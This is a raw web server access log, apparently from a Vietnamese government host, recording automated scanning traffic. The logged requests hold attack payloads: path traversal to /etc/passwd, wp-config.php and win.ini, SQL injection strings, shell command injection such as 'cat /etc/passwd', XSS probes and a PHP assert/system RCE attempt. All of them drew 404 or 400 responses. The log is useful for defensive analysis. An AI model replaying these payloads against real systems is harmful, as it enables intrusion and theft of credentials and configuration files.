Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 20:49:35 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.20 - 404 7 0 201 2024-12-12 20:49:54 103.153.214.94 GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php file=../../../../../../../LocalConfiguration.php 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 60 2024-12-12 20:50:01 103.153.214.94 GET /wp-content/force-download.php file=../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.35 - 404 7 0 175 2024-12-12 20:50:02 103.153.214.94 GET /pub/bscw.cgi/30 op=theme&style_name=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 33 2024-12-12 20:51:37 103.153.214.94 GET /linuxki/experimental/vis/kivis.php type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36+Edge/15.15063 - 404 7 0 36 2024-12-12 20:51:39 103.153.214.94 GET /WidgetHandler.ashx MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.65 - 404 7 0 31 2024-12-12 20:51:56 103.153.214.94 POST /service.web - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 220 2024-12-12 20:52:10 103.153.214.94 POST /send_order.cgi parameter=login 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 204 2024-12-12 20:52:39 103.153.214.94 GET / query=SHOW%20DATABASES 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 95 2024-12-12 20:53:01 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 217 2024-12-12 20:53:06 103.153.214.94 GET /data/pbootcms.db - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+17_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 134 2024-12-12 20:53:13 103.153.214.94 GET /<script>alert(document.domain)</script> - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 400 0 0 44 2024-12-12 20:53:34 103.153.214.94 GET /console/login/LoginForm.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.5.16 - 404 7 0 63 2024-12-12 20:54:01 103.153.214.94 GET /api/products limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9229672)))),0x7e),3550) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.24 - 404 7 0 64 2024-12-12 20:54:02 103.153.214.94 GET /settings - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 53 2024-12-12 20:54:10 103.153.214.94 GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php href=../../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 42 2024-12-12 20:54:43 103.153.214.94 GET /api/ping/;`id` - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 62 2024-12-12 20:54:44 103.153.214.94 GET /goforms/menu - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 55 2024-12-12 20:55:14 103.153.214.94 POST /21408623/cgi-bin/tsaws.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 20:55:24 103.153.214.94 GET /webmail/old/calendar/minimizer/index.php script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 20:55:28 103.153.214.94 GET /webmail/old/calendar/minimizer/index.php style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.15 - 404 7 0 33 2024-12-12 20:55:34 103.153.214.94 GET /install/checks - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.24 - 404 7 0 56 2024-12-12 20:57:40 103.153.214.94 GET /upload/mobile/index.php c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 77 2024-12-12 20:58:46 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(1) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 21:00:13 103.153.214.94 GET /api/proxy/tcp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.5.16 - 404 7 0 224 2024-12-12 21:00:35 103.153.214.94 GET /Visitor/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 400 0 0 35 2024-12-12 21:00:37 103.153.214.94 GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.79 - 404 7 0 40 2024-12-12 21:00:40 103.153.214.94 GET /Visitor/bin/WebStrings.srf file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 21:00:42 103.153.214.94 GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.7.18 - 404 7 0 33 2024-12-12 21:00:56 103.153.214.94 GET /WEBACCOUNT.CGI OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 58 2024-12-12 21:00:57 103.153.214.94 GET /fhem/FileLog_logWrapper dev=Logfile&file=%2fetc%2fpasswd&type=text 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.25 - 404 7 0 55 2024-12-12 21:02:41 103.153.214.94 GET /admin/elfinder/elfinder-cke.html - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 21:02:45 103.153.214.94 GET /assets/backend/elfinder/elfinder-cke.html - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 21:02:49 103.153.214.94 GET /assets/elFinder-2.1.9/elfinder.html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 32 2024-12-12 21:02:52 103.153.214.94 GET /assets/elFinder/elfinder.html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 21:02:52 103.153.214.94 GET /index.php option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 34 2024-12-12 21:02:54 103.153.214.94 GET /index.php option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 21:02:56 103.153.214.94 GET /backend/elfinder/elfinder-cke.html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 30 2024-12-12 21:03:02 103.153.214.94 GET /elfinder/elfinder-cke.html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 21:03:05 103.153.214.94 GET /uploads/assets/backend/elfinder/elfinder-cke.html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 33 2024-12-12 21:03:10 103.153.214.94 GET /uploads/assets/backend/elfinder/elfinder.html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2623.87+Safari/537.36 - 404 7 0 32 2024-12-12 21:03:14 103.153.214.94 GET /uploads/elfinder/elfinder-cke.html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 21:03:30 103.153.214.94 GET /prop.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 202 2024-12-12 21:03:30 103.153.214.94 GET /geoserver/web/ - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 200 2024-12-12 21:03:30 103.153.214.94 POST /geoserver/j_spring_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 - 404 7 0 207 2024-12-12 21:04:03 103.153.214.94 GET /index.asp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.19 - 404 7 0 32 2024-12-12 21:04:07 103.153.214.94 GET /oam/server/opensso/sessionservice - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 33 2024-12-12 21:04:08 103.153.214.94 GET /v1/folder path=%2F 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 21:04:25 103.153.214.94 POST / wicket:interface=:0:userPanel:loginForm::IFormSubmitListener:: 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 194 2024-12-12 21:04:59 103.153.214.94 GET /ADSearch.cc methodToCall=search 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 46 2024-12-12 21:05:07 103.153.214.94 GET /node_modules/mqtt/test/helpers/ - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 21:05:12 103.153.214.94 GET / p=3232&wp_automatic=download&link=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 49 2024-12-12 21:05:55 103.153.214.94 GET /resin-doc/viewfile/ file=index.jsp 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 43 2024-12-12 21:06:26 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 33 2024-12-12 21:06:41 103.153.214.94 GET /weaver/weaver.file.SignatureDownLoad markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 21:06:46 103.153.214.94 GET /manage.py - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 45 2024-12-12 21:06:50 103.153.214.94 GET /settings.py - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/46.0.2486.0+Safari/537.36+Edge/13.10586 - 404 7 0 36 2024-12-12 21:06:54 103.153.214.94 GET /app/settings.py - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 31 2024-12-12 21:06:58 103.153.214.94 GET /django/settings.py - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 37 2024-12-12 21:07:02 103.153.214.94 GET /settings/settings.py - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 37 2024-12-12 21:07:06 103.153.214.94 GET /web/settings/settings.py - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 21:07:56 103.153.214.94 POST /oauth/token - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 202 2024-12-12 21:07:56 103.153.214.94 POST /oauth/token - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 200 2024-12-12 21:07:56 103.153.214.94 POST /oauth/token - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 221 2024-12-12 21:07:56 103.153.214.94 POST /oauth/token - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.51 https://bcvt.kontum.gov.vn:8172 404 7 0 215 2024-12-12 21:07:56 103.153.214.94 POST /oauth/token - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 215 2024-12-12 21:07:56 103.153.214.94 POST /oauth/token - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) https://bcvt.kontum.gov.vn:8172 404 7 0 218 2024-12-12 21:08:56 103.153.214.94 GET /jsp/help-sb-download.jsp sbFileName=../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 56 2024-12-12 21:08:58 103.153.214.94 GET /sabnzbd/wizard/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.17 - 404 7 0 31 2024-12-12 21:09:01 103.153.214.94 GET /wizard/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 73 2024-12-12 21:09:01 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 61 2024-12-12 21:09:05 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 21:10:57 103.153.214.94 GET /api/get-organizations p=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml(1,version(),1) 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 63 2024-12-12 21:11:20 103.153.214.94 GET /ACSServer/DownloadFileServlet show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.4+Safari/605.1.15 - 404 7 0 36 2024-12-12 21:11:20 103.153.214.94 GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php pl=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_7_3;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.7+Safari/605.1.15 - 404 7 0 38 2024-12-12 21:11:24 103.153.214.94 GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php pl=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 35 2024-12-12 21:11:24 103.153.214.94 GET /ACSServer/DownloadFileServlet show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 90 2024-12-12 21:11:51 103.153.214.94 GET /webapi/v1/system/accountmanage/account - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 38 2024-12-12 21:11:53 103.153.214.94 GET /admin - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 21:11:53 103.153.214.94 GET /portal/SptmForPortalThumbnail.jsp preview=portal/SptmForPortalThumbnail.jsp 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.21 - 404 7 0 58 2024-12-12 21:13:57 103.153.214.94 GET /index.php option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 34 2024-12-12 21:15:06 103.153.214.94 GET /index.php m&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+a 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 21:15:06 103.153.214.94 GET /lan.html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 56 2024-12-12 21:15:14 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36 - 404 7 0 208 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 197 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 195 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 196 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:89.0)+Gecko/20100101+Firefox/89.0 - 404 7 0 200 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 - 404 7 0 201 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 204 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 207 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 215 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 21:15:16 